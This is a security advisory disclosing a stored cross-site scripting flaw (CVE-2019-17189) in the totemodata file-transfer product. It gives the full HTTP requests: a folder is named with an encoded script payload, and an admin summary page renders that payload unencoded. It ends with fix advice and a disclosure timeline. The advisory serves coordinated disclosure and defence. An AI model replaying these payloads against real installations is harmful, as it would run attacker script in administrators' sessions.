################################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
################################################################################
#
# Product:  totemodata
# Vendor:   totemo ag
# CSNC ID:  CSNC-2019-021
# CVE ID:   CVE-2019-17189
# Subject:  Stored Cross-Site Scripting (XSS)
# Risk:     High
# Effect:   Remotely exploitable
# Authors:  Fabio Poloni
# Date:     01.10.2019
#
################################################################################

Introduction:
-------------
totemodata[1] is a solution to transfer files securely. Compass Security
identified a stored cross-site scripting (XSS) from users to administrators.

Affected:
---------
Vulnerable:
 * totemodata 3.0.0_b936

Not vulnerable:
 * totemodata 3.0.0_b1005

No other version was tested, but older versions are believed to be vulnerable
as well.

Technical Description:
----------------------
A user can create a folder using an XSS payload (<script>alert(1)</script>) as
the name:

POST /drive/drive.xhtml HTTP/1.1
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Faces-Request: partial/ajax
X-Requested-With: XMLHttpRequest
Content-Length: 631
Cookie: primefaces.download=null; oam.Flash.RENDERMAP.TOKEN=83xhft4df; JSESSIONID=7AE12EDEDB2B1252DEB9A3323B31DAB6
Connection: close

javax.faces.partial.ajax=true
&javax.faces.source=dialogForm_j_id_g2_3_fileName
&javax.faces.partial.execute=dialogForm_j_id_g2_3_fileName
&javax.faces.partial.render=dialogForm_j_id_g2_3_actionButton+dialogForm_j_id_g2_3_fileName
&javax.faces.behavior.event=valueChange
&javax.faces.partial.event=change
&dialogForm_j_id_g2_3_fileName=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
&dialogForm_j_id_g2_r_filterFolders=
&dialogForm_j_id_g2_28_autoCompletePerson_input=
&dialogForm_j_id_g2_28_autoCompletePerson_hinput=
&dialogForm_SUBMIT=1
&javax.faces.ViewState=ZJki9C9J%2FWVdTSRqijjD6JDwkHp9vF3Jlin7Hz64iJS6PD7O

The server accepts the request as expected:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: oam.Flash.RENDERMAP.TOKEN=83xhft4dg; Path=/; Secure; HttpOnly
Pragma: no-cache
Cache-control: no-cache
Expires: -1
Content-Type: text/xml;charset=UTF-8
Date: Mon, 17 Jun 2019 12:35:33 GMT
Connection: close
Content-Length: 1554

[CUT BY COMPASS]
[CUT BY COMPASS]
[CUT BY COMPASS]

Interestingly, when requesting the folder tree view in the admin interface:

POST /smftg/dynamic/folderContentForTree.jsp?node=%2Fhome%2Ffabio.poloni%40compass-security.com_UUID_26_1 HTTP/1.1
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=17A7B68604DEF2101643FE651C03AD17; oam.Flash.RENDERMAP.TOKEN=83xhft4dl; JSESSIONID=7AE12EDEDB2B1252DEB9A3323B31DAB6
Connection: close
Cache-Control: max-age=0
Content-Length: 0

the payload is encoded as it should be:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 876
Date: Mon, 17 Jun 2019 12:37:41 GMT
Connection: close

[CUT BY COMPASS]

However, requesting the folder summary:

POST /smftg/dynamic/folderSummary.jsp?folderPath=%2Fhome%2Ffabio.poloni%40compass-security.com_UUID_26_1%2F%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=17A7B68604DEF2101643FE651C03AD17; oam.Flash.RENDERMAP.TOKEN=83xhft4dm; JSESSIONID=7AE12EDEDB2B1252DEB9A3323B31DAB6
Connection: close
Content-Length: 0

returns the payload unencoded, so it is executed in the context of the
administrator:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 2092
Date: Mon, 17 Jun 2019 12:37:49 GMT
Connection: close

[CUT BY COMPASS]

Workaround / Fix:
-----------------
All user input should be output-encoded at all times; additionally, a Content
Security Policy (CSP) should be set to prevent execution of inline JavaScript.

As a totemodata customer, please update your installation to the latest
version.

Timeline:
---------
2019-06-17: Discovery by Fabio Poloni
2019-07-11: Initial vendor notification
2019-07-11: Initial vendor response
2019-07-22: Vendor confirmed vulnerability is patched
2019-09-26: Patch confirmed
2019-10-02: CVE requested
2019-10-05: CVE assigned: CVE-2019-17189
2019-10-21: Coordinated public disclosure date

References:
-----------
[1] https://www.totemo.com/en/solutions/secure-file-transfer